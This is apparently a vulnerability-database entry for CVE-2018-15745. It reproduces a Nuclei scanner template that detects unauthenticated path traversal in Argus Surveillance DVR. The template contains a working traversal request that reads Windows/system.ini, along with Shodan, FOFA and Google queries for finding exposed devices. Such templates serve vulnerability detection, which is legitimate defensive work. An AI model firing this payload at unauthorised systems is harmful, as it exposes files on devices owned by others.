Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2018-15745
HistoryAug 04, 2021 - 5:16 a.m.

Argus Surveillance DVR 4.0.0.0 - Local File Inclusion

2021-08-0405:16:24
ProjectDiscovery
github.com
36

5 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

7.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

7.3 High

AI Score

Confidence

High

0.904 High

EPSS

Percentile

98.8%

Argus Surveillance DVR 4.0.0.0 devices allow unauthenticated local file inclusion, leading to file disclosure via a ..%2F in the WEBACCOUNT.CGI RESULTPAGE parameter.
id: CVE-2018-15745

info:
  name: Argus Surveillance DVR 4.0.0.0 - Local File Inclusion
  author: gy741
  severity: high
  description: |
    Argus Surveillance DVR 4.0.0.0 devices allow unauthenticated local file inclusion, leading to file disclosure via a ..%2F in the WEBACCOUNT.CGI RESULTPAGE parameter.
  impact: |
    An attacker can exploit this vulnerability to read sensitive files on the server.
  remediation: |
    Upgrade to a patched version of Argus Surveillance DVR.
  reference:
    - http://hyp3rlinx.altervista.org/advisories/ARGUS-SURVEILLANCE-DVR-v4-UNAUTHENTICATED-PATH-TRAVERSAL-FILE-DISCLOSURE.txt
    - http://packetstormsecurity.com/files/149134/Argus-Surveillance-DVR-4.0.0.0-Directory-Traversal.html
    - https://www.exploit-db.com/exploits/45296/
    - https://nvd.nist.gov/vuln/detail/CVE-2018-15745
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2018-15745
    cwe-id: CWE-22
    epss-score: 0.92562
    epss-percentile: 0.98989
    cpe: cpe:2.3:a:argussurveillance:dvr:4.0.0.0:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: argussurveillance
    product: dvr
    shodan-query: http.title:"web viewer for samsung dvr"
    fofa-query: title="web viewer for samsung dvr"
    google-query: intitle:"web viewer for samsung dvr"
  tags: cve,cve2018,packetstorm,edb,argussurveillance,lfi,dvr

http:
  - method: GET
    path:
      - "{{BaseURL}}/WEBACCOUNT.CGI?OkBtn=++Ok++&RESULTPAGE=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FWindows%2Fsystem.ini&USEREDIRECT=1&WEBACCOUNTID=&WEBACCOUNTPASSWORD="

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "for 16-bit app support"
          - "[drivers]"
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a004730450221009ca9821ca84e3035987df97624dd5b8883b8c4849fc29b8142652e4e7d0080610220312c12edb16e29c072a827155cdebc39f586b5d5c69b398cb846e2c7d93792da:922c64590222798bb761d5b6d8e72950

5 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

7.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

7.3 High

AI Score

Confidence

High

0.904 High

EPSS

Percentile

98.8%